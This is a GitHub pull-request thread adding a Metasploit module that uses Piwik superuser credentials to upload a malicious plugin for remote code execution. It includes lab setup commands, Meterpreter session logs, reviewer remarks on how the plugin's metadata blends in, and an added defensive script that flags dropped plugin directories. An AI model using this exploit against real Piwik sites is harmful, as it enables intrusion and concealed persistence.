add piwik superuser plugin upload module #7917

Merged
merged 2 commits into from Feb 14, 2017

@FireFart
Contributor

FireFart commented Feb 5, 2017

This PR adds a module to upload a generated plugin to a piwik installation after you have grabbed superuser credentials. This way you can turn superuser credentials into remote code execution. The plugin also tries to enable the Marketplace plugin if it's currently deactivated. Only having admin rights is not enough for this module, you need real superuser access.

Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1 (you can get older versions from https://builds.piwik.org/)

To install on Debian as root:

apt install apache2 php5 php5-mysql libapache2-mod-php5 mariadb-server unzip php5-gd php5-curl

wget https://builds.piwik.org/piwik.zip
unzip -d /var/www/html/ piwik.zip 
chown -R www-data:www-data /var/www/html/

mysql -u root -ppassword -e "CREATE DATABASE piwik;"
mysql -u root -ppassword -e "CREATE USER piwik@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik@localhost=PASSWORD('piwik');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik.* TO piwik@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

echo always_populate_raw_post_data=-1 > /etc/php5/apache2/conf.d/99-piwik.ini
service apache2 restart

After the install, browse to http://IP/piwik/ and follow the installation steps. If you have an ad blocker installed, you need to disable it for the site; otherwise almost everything will be blocked.

Be sure to also deactivate the Marketplace plugin in Settings-->System-->Plugins to test this feature.

To test other piwik versions too:

wget https://builds.piwik.org/piwik-2.17.1.zip
unzip piwik-2.17.1.zip
mv piwik /var/www/html/piwik217
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik217;"
mysql -u root -ppassword -e "CREATE USER piwik217@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik217@localhost=PASSWORD('piwik217');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik217.* TO piwik217@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

wget https://builds.piwik.org/piwik-2.16.0.zip
unzip piwik-2.16.0.zip
mv piwik /var/www/html/piwik216
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik216;"
mysql -u root -ppassword -e "CREATE USER piwik216@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik216@localhost=PASSWORD('piwik216');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik216.* TO piwik216@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

wget https://builds.piwik.org/piwik-2.14.0.zip
unzip piwik-2.14.0.zip
mv piwik /var/www/html/piwik214
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik214;"
mysql -u root -ppassword -e "CREATE USER piwik214@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik214@localhost=PASSWORD('piwik214');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik214.* TO piwik214@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

wget https://builds.piwik.org/piwik-1.12.zip
unzip piwik-1.12.zip
mv piwik /var/www/html/piwik112
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik112;"
mysql -u root -ppassword -e "CREATE USER piwik112@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik112@localhost=PASSWORD('piwik112');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik112.* TO piwik112@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

Sample Output:

msf exploit(piwik_admin_plugin_upload) > options

Module options (exploit/unix/webapp/piwik_admin_plugin_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   firefart         yes       The Piwik password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.56.2     yes       The target address
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /piwik/          yes       The URI path of the Piwik installation
   USERNAME   firefart         yes       The Piwik username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Piwik


msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:48145) at 2017-02-06 10:06:47 +0100
[+] Deleted plugins/PRDAvCIKBY/plugin.json
[+] Deleted plugins/PRDAvCIKBY/PRDAvCIKBY.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik217/
TARGETURI => /piwik217/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 2.17.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.2:48158) at 2017-02-06 10:07:14 +0100
[+] Deleted plugins/ygpstFTvqz/plugin.json
[+] Deleted plugins/ygpstFTvqz/ygpstFTvqz.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik216/
TARGETURI => /piwik216/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 2.16.0
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.2:48168) at 2017-02-06 10:07:31 +0100
[+] Deleted plugins/lmepCZtuzN/plugin.json
[+] Deleted plugins/lmepCZtuzN/lmepCZtuzN.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik214/
TARGETURI => /piwik214/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 2.14.0
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.2:48177) at 2017-02-06 10:07:46 +0100
[+] Deleted plugins/DhPhZeafJf/plugin.json
[+] Deleted plugins/DhPhZeafJf/DhPhZeafJf.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik112/
TARGETURI => /piwik112/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[-] Exploit aborted due to failure: not-found: The target does not appear to be running Piwik
[*] Exploit completed, but no session was created.
meterpreter > sysinfo
Computer    : web
OS          : Linux web 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
Meterpreter : php/linux
meterpreter > 
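The sample output above shows what the module leaves on disk: a directory under plugins/ named with ten random letters (PRDAvCIKBY, ygpstFTvqz, ...) holding a plugin.json and a single PHP file named after the directory, which the module then tries to delete. A later comment in this thread shows a run where that cleanup did not happen, so a defender auditing a Piwik install wants a check that does not depend on the files being removed. The following script is an added example, not part of the PR or of the Metasploit module: it compares the plugins/ directory against a reference set of plugin names (here a constructed set; in practice the directory names from a pristine copy of the same Piwik release) and flags anything unknown, scoring higher when the directory shape matches the one in the output. The plugin.json key layout used in the constructed sample is assumed, and the license, author and version fields are recorded only for the report, since a dropped plugin can carry plausible values for all three.

```python
import json
import re
import tempfile
from pathlib import Path

# Constructed reference set. In a real audit, take the directory names under
# plugins/ from a pristine copy of the same Piwik release (assumption: the
# operator keeps such a copy; the PR gives no manifest).
KNOWN_PLUGINS = {"CoreHome", "Marketplace", "UsersManager", "SitesManager"}

# The directory names in the PR's sample output (PRDAvCIKBY, ygpstFTvqz, ...)
# are ten mixed-case ASCII letters.
RANDOM_NAME = re.compile(r"^[A-Za-z]{10}$")


def audit_plugins(plugins_dir, known=KNOWN_PLUGINS):
    """Return one finding per plugin directory that is not in the reference set.

    Each finding lists why the directory looks suspicious. Metadata from
    plugin.json is recorded but never used to clear a directory, because a
    dropped plugin can carry a plausible license, author and version.
    """
    findings = []
    for entry in sorted(Path(plugins_dir).iterdir()):
        if not entry.is_dir() or entry.name in known:
            continue
        name = entry.name
        reasons = ["not in release manifest"]
        if RANDOM_NAME.match(name):
            reasons.append("name is ten random-looking letters")
        php_files = sorted(p.name for p in entry.glob("*.php"))
        if php_files == [name + ".php"]:
            reasons.append("single PHP file named after the directory")
        meta = {}
        manifest = entry / "plugin.json"
        if manifest.is_file():
            try:
                meta = json.loads(manifest.read_text())
            except ValueError:
                reasons.append("unparseable plugin.json")
        else:
            reasons.append("no plugin.json")
        findings.append({
            "plugin": name,
            "reasons": reasons,
            "license": meta.get("license"),
            "version": meta.get("version"),
            "php_files": php_files,
        })
    return findings


def build_sample_tree(root):
    """Create a constructed plugins/ tree: shipped plugins, one in-house
    plugin and one directory shaped like the dropped plugin in the PR output."""
    plugins = Path(root) / "plugins"
    for name in KNOWN_PLUGINS:
        (plugins / name).mkdir(parents=True)
        (plugins / name / "plugin.json").write_text(json.dumps({"name": name}))
    custom = plugins / "MyCompanyReports"  # constructed, legitimately unknown
    custom.mkdir()
    (custom / "plugin.json").write_text(
        json.dumps({"name": "MyCompanyReports", "version": "1.0"}))
    (custom / "Controller.php").write_text("<?php // constructed sample\n")
    (custom / "API.php").write_text("<?php // constructed sample\n")
    dropped = plugins / "PRDAvCIKBY"  # name taken from the PR's sample output
    dropped.mkdir()
    # Constructed plugin.json with the fields the thread says blend in
    # (key layout assumed; the page does not show the file).
    (dropped / "plugin.json").write_text(json.dumps({
        "name": "PRDAvCIKBY", "version": "2.3.7",
        "license": "GPL v3+", "authors": [{"name": "Piwik"}]}))
    (dropped / "PRDAvCIKBY.php").write_text(
        "<?php // placeholder file, not the module's plugin code\n")
    return plugins


def run_demo():
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_plugins(build_sample_tree(tmp))


if __name__ == "__main__":
    for finding in run_demo():
        print(finding["plugin"], "->", "; ".join(finding["reasons"]))
```

On the constructed tree the in-house plugin is reported once (unknown to the manifest) while the PRDAvCIKBY directory collects all three reasons; the reference set is what makes the check work, so it has to come from the release actually deployed, not from the live instance being audited.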

@FireFart FireFart added the module label Feb 5, 2017

@FireFart FireFart changed the title from add piwik admin plugin upload module to add piwik superuser plugin upload module Feb 7, 2017

@FireFart FireFart force-pushed the FireFart:piwik_plugin branch from 876fbe7 to baa473a Feb 10, 2017

@h00die

Contributor

h00die commented Feb 13, 2017

I'll make you a deal. If you add module docs, I'll review this within the next 48 hrs.

@FireFart

Contributor

FireFart commented Feb 13, 2017

@h00die deal :) documentation added

@wvu-r7

Contributor

wvu-r7 commented Feb 13, 2017

I nominate @h00die as documentation czar.

@h00die

Contributor

h00die commented Feb 13, 2017

@wvu-r7

  1. there are no challengers
  2. I thought that was already agreed to
@FireFart

Contributor

FireFart commented Feb 13, 2017

@wvu-r7
a

@wvu-r7

Contributor

wvu-r7 commented Feb 13, 2017

@h00die: We should give you a badge.

@h00die h00die self-assigned this Feb 14, 2017

@h00die h00die added the docs label Feb 14, 2017

@h00die

Contributor

h00die commented Feb 14, 2017

Had some oddities but I think it's due to my own configuration of running VirtualBox and the port forwarding.
However, it did give me all the shells. I know @egypt <3 shells, and it's Valentine's Day and all... but shells picked me over him this time.

For completeness, I used a bind shell, and Ubuntu 14.04.

msf exploit(piwik_superuser_plugin_upload) > exploit

[*] Trying to detect if target is running a supported version of piwik
[*] Started bind handler
[*] Sending stage (33986 bytes) to 127.0.0.1
[+] Detected Piwik installation
[*] Authenticating with Piwik using admin:adminadmin...
[*] Meterpreter session 1 opened (127.0.0.1:44559 -> 127.0.0.1) at 2017-02-14 00:40:13 -0500
[-] Meterpreter session 1 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 1 closed.
[+] Authenticated with Piwik
[*] Checking if user admin has superuser access
[+] User admin has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin XmZeBDefEZ generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[!] This exploit may require manual cleanup of 'plugins/XmZeBDefEZ/plugin.json' on the target
[!] This exploit may require manual cleanup of 'plugins/XmZeBDefEZ/XmZeBDefEZ.php' on the target

[-] Invalid session identifier: 1
msf exploit(piwik_superuser_plugin_upload) > exploit

[*] Started bind handler
[*] Trying to detect if target is running a supported version of piwik
[*] Sending stage (33986 bytes) to 127.0.0.1
[+] Detected Piwik installation
[*] Authenticating with Piwik using admin:adminadmin...
[*] Meterpreter session 2 opened (127.0.0.1:40109 -> 127.0.0.1:1337) at 2017-02-14 00:40:36 -0500
[+] Authenticated with Piwik
[*] Checking if user admin has superuser access
[+] User admin has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin lCEYgTsmXq generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[!] This exploit may require manual cleanup of 'plugins/lCEYgTsmXq/plugin.json' on the target
[!] This exploit may require manual cleanup of 'plugins/lCEYgTsmXq/lCEYgTsmXq.php' on the target

meterpreter > sysinfo
Computer    : piwiki
OS          : Linux piwiki 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64
Meterpreter : php/linux

@h00die

Contributor

h00die commented Feb 14, 2017

Several things that are VERY nice about this module:
GPL license blends in with the rest (not sure if you manually set that)
Author is Piwik, which blends in nicely
version numbers are randomized, but look legit.

@h00die

Contributor

h00die commented Feb 14, 2017

docs are beautiful. @wvu-r7 you should take notes 😛

@h00die h00die merged commit d7f6755 into rapid7:master Feb 14, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
h00die added a commit that referenced this pull request Feb 14, 2017

@h00die

Contributor

h00die commented Feb 14, 2017

seriously though, the code is beautiful.

@h00die

Contributor

h00die commented Feb 14, 2017

Release Notes

An exploit for Piwik is now available. An authenticated super user can upload a malicious plugin that causes remote code execution.

@FireFart FireFart deleted the FireFart:piwik_plugin branch Feb 14, 2017

@FireFart

Contributor

FireFart commented Feb 14, 2017

Thanks @h00die :)

@wvu-r7

Contributor

wvu-r7 commented Feb 14, 2017

Duly noted! Fantastic work as always, @FireFart. :D

@tdoan-r7 tdoan-r7 added the rn-exploit label Feb 22, 2017